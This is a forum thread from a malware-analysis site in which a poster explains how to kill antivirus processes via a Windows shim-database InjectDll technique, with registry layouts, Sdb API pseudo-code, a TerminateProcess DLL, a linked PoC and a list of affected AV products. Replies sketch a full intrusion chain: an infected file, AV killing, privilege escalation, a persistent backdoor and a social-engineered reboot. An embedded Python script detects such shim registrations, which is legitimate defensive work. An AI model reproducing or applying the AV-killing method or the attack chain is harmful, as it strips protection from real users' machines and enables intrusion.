A forum for reverse engineering, OS internals and malware analysis 

Forum for announcements and questions about tools and software.
 #15851  by 0x16/7ton
 Tue Oct 02, 2012 10:56 am
Hello all :)

Now I'll show you a simple method of killing a 32-bit process... for example Kaspersky v13.0.1.4190 avp.exe :D
First of all read this:
http://technet.microsoft.com/en-us/libr ... 10%29.aspx
Okay, I call this the Shims engine attack :ugeek:
Then download that ms toolkit:
http://www.microsoft.com/en-us/download ... px?id=7352
With the shim mechanism Microsoft gives us a list of application compatibility fixes that you can view using the toolkit.
Looking at the fixes, you can quickly find one that is very interesting for us:
-InjectDll
Fix Description:
Preloads required static DLL files for the application. Some applications use dynamically loaded DLL files, which can issue calls to static DLL files before the application is ready. This compatibility fix requires a command prompt with a list of the affected DLL files. The files are loaded in the order listed in the command prompt.

Okay. Now the task is much clearer. We must create a compatibility database with our toolkit.
The database will contain fixes for such processes as avp.exe :lol:
Now the points:
  • We create our compatibility mode.
    Choose InjectDll for it, and as the parameter specify the path to the executable dll.
    The best option would be an independent path: \\?\Globalroot\systemroot\[dllname]
  • Next, create a fix on the application (just think, everything is all right there). As the application, use a PE file without too much crap, with the name of the necessary process :)
    Accordingly there can be many fixes in one database, while there will be one compatibility mode.
By creating such a database we can put it in resources.. or in our PoC cab file, as you like)
Next task is to install and register a base.
It can be solved very simply and automatically, or a little more complicated and manually)

Automatic way
This uses the built-in utility sdbinst.exe (systemroot/system32/sdbinst.exe)
Read about it here
http://technet.microsoft.com/en-us/libr ... 10%29.aspx
But I think it is a lazy, lame way))

Manual install
First we need to create two registry keys:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
In this key the name of the process to fix is stored as a subkey, for example an exported reg key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\avp.exe]
"{fbf19186-a63a-44c1-b79d-****e56cfe0e}.sdb"=hex(b):90,d1,ec,4f,21,9e,cd,01


{fbf19186-a63a-44c1-b79d-****e56cfe0e} is the GUID of the sdb database (its GUID tag) formatted as a string
And the REG_QWORD of this subkey is the return value of GetSystemTimeAsFileTime (system date and time in UTC format)

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB
In this key the registered .sdb database is stored as a subkey

Ok. Then we must extract data and register our .sdb database... it's possible with the Sdb* API from Apphelp.dll

This block of pseudo-code reads the GUID of the .sdb database and formats it as a string with the ".sdb" extension
	handle=SdbOpenDatabase(path_to_sdb);
	tagIdCLSID=SdbFindFirstTag(handle,rootTag,APPHELP_TAG_DATABASE_ID);
	SdbReadBinaryTag(..&mas_guid..);
	RtlStringFromGUID(&mas_guid,&guid_string);
	wcscat (guid_string,".sdb");
	SdbCloseDatabase(handle);
This block extracts the names of all processes from the .sdb database
	handle=SdbOpenDatabase(path_to_sdb);
	tagId1=SdbFindFirstTag(handle,rootTag,APPHELP_TAG_EXE);
	tagId2=SdbFindFirstTag(handle,tagId1,APPHELP_TAG_NAME);
	do
	{
		if(tagId2!=NULL)
		{
			pointer_to_string=SdbGetStringTagPtr(handle,tagId2);
			// install here a subkey in [\AppCompatFlags\Custom] named after the process (pointer_to_string),
			// with the formatted guid as the value name and the system time as the value
			RegInst(pointer_to_string);
		}
		tagId2=SdbFindNextTag(handle,rootTag,tagId2);
	}
	while(tagId2!=NULL);
	SdbCloseDatabase(handle);
Okay, now registration time.
	SdbRegisterDatabaseEx(path_to_sdb,0x10000,NULL);
	ShimFlushCache(0,0,0,0);
Oh, and I almost forgot: we need to drop our injected dll to the path (systemroot\dllname)..
The code of the dll is simple :)
TerminateProcess(0x29a);

It's done and must work :)

Of course there is a big minus: the currently running AV would only be unloaded after rebooting the system, and we still need admin privileges to install the .sdb database.

Okay, and here I have attached my PoC tool)
PoC AVkill
Pass:infected

Here is a link to a video of the working PoC:
http://www.sendspace.com/file/k709wi

The list of AVs which were tested with my PoC:
Kis 2012,2013
Eset NOD32
DrWeb
Avast
McAfee
Avira
BitDefender (only 32bit)
NortonInternetSecurity
Fsecure
Panda
Outpost
ZoneAlarm

And all of them are vulnerable to this method, of course...
Thanks for reading..:)
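From the defender's side, the most useful artifact in the post is the registry footprint it describes: a per-process subkey under AppCompatFlags\Custom whose value name is "{GUID}.sdb" and whose REG_QWORD data is the FILETIME of registration. The script below is an added example (not the post's PoC and not Microsoft's tooling) that parses a .reg export of that key, decodes the FILETIME, and flags registrations aimed at security-product processes. The sample export, the GUIDs and the timestamps are constructed for the example; the watchlist is a seed list containing only avp.exe, the process named in the post, which a real deployment would extend.

```python
"""Triage helper for custom shim-database registrations (added example, defender side).

Parses a .reg export of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom,
decodes the REG_QWORD FILETIME stored for each registered .sdb, and reports the entries whose
target process is a security product. All input below is constructed for this example.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sample export: GUIDs and timestamps are placeholders, not values from the post.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\avp.exe]
"{00000000-0000-0000-0000-000000000001}.sdb"=hex(b):90,d1,ec,4f,21,9e,cd,01

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\legacyapp.exe]
"{00000000-0000-0000-0000-000000000002}.sdb"=hex(b):00,00,00,00,00,00,00,00
"""

# Seed watchlist (assumption): avp.exe is the only process the post names; extend it to the
# security products actually deployed in your environment.
WATCHLIST = {"avp.exe"}

CUSTOM_KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
    r"\\AppCompatFlags\\Custom\\([^\]\\]+)\]\s*$",
    re.IGNORECASE,
)
SDB_VALUE_RE = re.compile(
    r'^"([^"]+\.sdb)"=hex\(b\):([0-9a-f]{2}(?:,[0-9a-f]{2})*)\s*$', re.IGNORECASE
)

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


@dataclass
class ShimEntry:
    exe: str                   # process name used as the subkey (the shim target)
    sdb: str                   # "{GUID}.sdb" value name
    registered_utc: datetime   # decoded REG_QWORD FILETIME


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a Windows FILETIME (100-ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_hex_b(payload: str) -> int:
    """Decode the little-endian byte list of a hex(b) (REG_QWORD) .reg value."""
    raw = bytes(int(b, 16) for b in payload.split(","))
    return int.from_bytes(raw, "little")


def parse_custom_entries(reg_text: str) -> list[ShimEntry]:
    """Walk a .reg export and collect every per-process .sdb registration."""
    entries = []
    current_exe = None
    for line in reg_text.splitlines():
        key = CUSTOM_KEY_RE.match(line)
        if key:
            current_exe = key.group(1)
            continue
        if line.startswith("["):   # some other key: stop attributing values to the last Custom subkey
            current_exe = None
            continue
        value = SDB_VALUE_RE.match(line)
        if value and current_exe is not None:
            entries.append(ShimEntry(
                exe=current_exe,
                sdb=value.group(1),
                registered_utc=filetime_to_datetime(parse_hex_b(value.group(2))),
            ))
    return entries


def find_suspicious(entries, watchlist=WATCHLIST):
    """Return registrations whose target process is on the security-product watchlist."""
    return [e for e in entries if e.exe.lower() in watchlist]


if __name__ == "__main__":
    for hit in find_suspicious(parse_custom_entries(SAMPLE_REG)):
        print(f"[!] custom shim for {hit.exe}: {hit.sdb} "
              f"registered {hit.registered_utc:%Y-%m-%d %H:%M:%S} UTC")
```

The decoded timestamp is what makes the entry triageable: a shim registration for an AV process whose FILETIME does not line up with any software deployment is worth correlating with the matching InstalledSDB subkey and with the .sdb file it points at.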
 #15856  by kmd
 Tue Oct 02, 2012 2:16 pm
cool find!

aside from killing these AVs... can it be considered a new way of autoloading payload DLLs?

p.s.
a year ago I did a KIS2012 bypass with an autoclicker - it installed my own app as a service via Windows scripting without any beep from proactive defense.
 #15860  by 0x16/7ton
 Tue Oct 02, 2012 3:32 pm
kmd wrote:cool find!

aside from killing these AVs... can it be considered a new way of autoloading payload DLLs?

p.s.
a year ago I did a KIS2012 bypass with an autoclicker - it installed my own app as a service via Windows scripting without any beep from proactive defense.
Of course it can, for example to attack a browser process :) On an x86 system I inject a dll into explorer.exe, a simple autorun :)
 #15861  by clapclash
 Tue Oct 02, 2012 4:48 pm
Thank you very much 0x16/7ton! I have one question for you: after establishing a connection with the target machine using a malicious payload, in order to kill the AV process do I need to specify any PID, or will your script just look for any AV PIDs and kill them?
 #15862  by 0x16/7ton
 Tue Oct 02, 2012 4:56 pm
clapclash wrote:Thank you very much 0x16/7ton! I have one question for you: after establishing a connection with the target machine using a malicious payload, in order to kill the AV process do I need to specify any PID, or will your script just look for any AV PIDs and kill them?
mmmm?? Did you read the article?) It is a local, independent PoC, without exploitation :lol:
 #15863  by clapclash
 Tue Oct 02, 2012 5:06 pm
Yes, I've read the article but unfortunately I didn't get that point. Anyway, suppose we're trying to exploit a target machine and, once the connection is established, we want to escalate privileges in order to conduct a more complete attack; in this case, if the target machine is running an AV it will easily detect the operation and reject it; now the point is: to disable the AV while we're conducting a remote exploit, can I use the script, just by simply running it on the target machine using a shell or by including the script in a payload, or not?
Sorry for bothering you with so many questions, but I find your post EXTREMELY interesting! Congrats!
 #15864  by 0x16/7ton
 Tue Oct 02, 2012 5:19 pm
clapclash wrote:Yes, I've read the article but unfortunately I didn't get that point. Anyway, suppose we're trying to exploit a target machine and, once the connection is established, we want to escalate privileges in order to conduct a more complete attack; in this case, if the target machine is running an AV it will easily detect the operation and reject it; now the point is: to disable the AV while we're conducting a remote exploit, can I use the script, just by simply running it on the target machine using a shell or by including the script in a payload, or not?
Sorry for bothering you with so many questions, but I find your post EXTREMELY interesting! Congrats!
In this way the payload may simply download the killing module and launch it. But the problem is that you need to reboot the system to complete unloading the running AV software :)
 #15866  by clapclash
 Tue Oct 02, 2012 5:50 pm
So the best method would be: 1) send an infected file 2) target opens file 3) AV killed 4) wait until reboot of target 5) exploit and gain admin priv. 6) establish permanent backdoor. What if we could include a simple set of commands that, after alerting the user of a (fake) problem, reboots the system given the user's authorisation? What do you think?
 #15868  by 0x16/7ton
 Tue Oct 02, 2012 6:28 pm
clapclash wrote:So the best method would be: 1) send an infected file 2) target opens file 3) AV killed 4) wait until reboot of target 5) exploit and gain admin priv. 6) establish permanent backdoor. What if we could include a simple set of commands that, after alerting the user of a (fake) problem, reboots the system given the user's authorisation? What do you think?
It is possible, like a social engineering attack, but I think we're going off-topic :D :D :D